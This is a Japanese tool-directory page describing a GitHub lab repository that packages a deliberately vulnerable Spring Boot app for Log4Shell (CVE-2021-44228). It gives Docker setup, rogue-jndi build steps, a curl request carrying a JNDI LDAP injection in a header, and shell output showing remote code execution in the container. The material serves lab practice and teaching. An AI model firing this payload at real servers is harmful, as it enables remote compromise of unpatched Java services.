Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228-poc — log4shell サンプルアプリケーション (CVE-2021-44228) | Kitploit
ツール/GitHubGitHub/kadantte/cve-2021-44228-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubkadantte/cve-2021-44228-poc

CVE-2021-44228-poc

log4shell サンプルアプリケーション (CVE-2021-44228)

リポジトリを見る
434年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4Shell サンプル脆弱性アプリケーション (CVE-2021-44228)

これは https://github.com/christophetd/log4shell-vulnerable-app のほぼコピー/類似した脆弱性アプリケーションです。

主な違いは、gradle ではなく maven を使用していることと、rogue-jndi を使用していることです。

このリポジトリには、CVE-2021-44228(通称 Log4Shell)に対して脆弱な maven Spring Boot Web アプリケーションが含まれています。Log4j 2.6.1 と JDK バージョン 1.8.0_181 を使用しています。

Spring Boot アプリケーションの実行

Docker Spring Boot アプリケーションをビルドして実行します:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app

エクスプロイト

  1. git clone https://github.com/veracode-research/rogue-jndi
  2. cd rogue-jndi
  3. mvn package
  4. java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test_if_rce" --hostname "192.168.1.x"

2つ目のターミナルを開きます

  1. curl localhost:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.x:1389/o=reference}'

どちらの場合も、192.168.1.x はあなたのIPアドレスです。

注: localhost は使用せず、実際のプライベートIPアドレスを使用してください。

RCE が成功したか確認します:

root@kitploit:~
$ docker ps                                 
CONTAINER ID   IMAGE            COMMAND                  CREATED         STATUS         PORTS                                       NAMES
04536dbd1dff   vulnerable-app   "java -jar demo-0.0.…"   2 minutes ago   Up 2 minutes   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   gallant_easley
root@kitploit:~
$ docker container exec -it 04536dbd1dff ash
/opt/app # ls /tmp
hsperfdata_root                          tomcat-docbase.8080.4585569232401237075
test_if_rce                              tomcat.8080.1707298461175346507

ご覧のとおり、ファイル test_if_rce が存在します。これは RCE が成功したことを意味します。

注意

以下のリポジトリからコードとアイデアを利用しています:

  • https://github.com/rayhan0x01/log4shell-vulnerable-app/tree/mod

  • https://www.lunasec.io/docs/blog/log4j-zero-day/

  • https://github.com/christophetd/log4shell-vulnerable-app

ツールをダウンロード